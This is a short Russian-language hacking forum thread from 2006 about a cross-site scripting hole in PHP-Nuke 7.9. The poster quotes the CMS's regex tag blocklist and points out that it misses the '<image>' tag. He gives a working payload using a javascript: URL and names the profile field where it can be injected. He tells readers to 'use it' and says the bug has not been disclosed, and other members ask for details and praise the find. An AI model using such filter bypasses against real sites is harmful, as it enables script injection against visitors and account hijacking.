баг в PHP-Nuke 7.9

Discussion in 'Уязвимости' started by Dr0ne, 23 Feb 2006.

  1. Dr0ne

    Dr0ne New Member

    Joined:
    22 Feb 2006
    Messages:
    7
    Likes Received:
    2
    Reputations:
    1
    я просмотрел код нюки на русском на нашел брешь в проверке на XSS
    PHP:
    if (!defined('ADMIN_FILE')) {      foreach ($_GET as $sec_key => $secvalue) {          if ((eregi("<[^>]*script*\"?[^>]*>"$secvalue)) ||          (eregi("<[^>]*object*\"?[^>]*>"$secvalue)) ||          (eregi("<[^>]*iframe*\"?[^>]*>"$secvalue)) ||          (eregi("<[^>]*applet*\"?[^>]*>"$secvalue)) ||          (eregi("<[^>]*meta*\"?[^>]*>"$secvalue)) ||          (eregi("<[^>]*style*\"?[^>]*>"$secvalue)) ||          (eregi("<[^>]*form*\"?[^>]*>"$secvalue)) ||          (eregi("<[^>]*img*\"?[^>]*>"$secvalue)) ||          (eregi("<[^>]*onmouseover*\"?[^>]*>"$secvalue)) ||          (eregi("\([^>]*\"?[^)]*\)"$secvalue)) ||          (eregi("\""$secvalue)) ||          (eregi("forum_admin"$sec_key)) ||          (eregi("inside_mod"$sec_key))) {
    тут нет проверки на тэг <image >
    атаку можно провести так
    HTML:
    <image src=javascript:alert('ok')>
    пользуйтесь. будут вопросы - обращайтесь
     
    2 people like this.
  2. PinkPanther

    PinkPanther [ розовый мафиозо ]

    Joined:
    16 Mar 2005
    Messages:
    280
    Likes Received:
    75
    Reputations:
    85
    RE конечно, но хотелось бы немного поподробнее....
     
  3. Nova

    Nova Green member

    Joined:
    15 Jul 2005
    Messages:
    1,233
    Likes Received:
    420
    Reputations:
    280
    Мне тоже интересно стало.... раскажи подробней...
     
    _________________________
  4. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    А что тут подробней он ведь и так уже выложил уязвимость можно сказать.
     
  5. Mobile

    Mobile Elder - Старейшина

    Joined:
    18 Feb 2006
    Messages:
    1,089
    Likes Received:
    822
    Reputations:
    324
    Прикольно, держи +
     
  6. grinay

    grinay IQ- 137%

    Joined:
    15 Jun 2004
    Messages:
    409
    Likes Received:
    174
    Reputations:
    305
    вопрос только в том где вводить а?
     
  7. Dr0ne

    Dr0ne New Member

    Joined:
    22 Feb 2006
    Messages:
    7
    Likes Received:
    2
    Reputations:
    1
    чтоб точно узнать пришлось денвер ставить)))
    Ваш аккаунт - Персональная информация - Немного о себе:
    =======================
    кста я эту багу никому не показывал и никто о ней не знал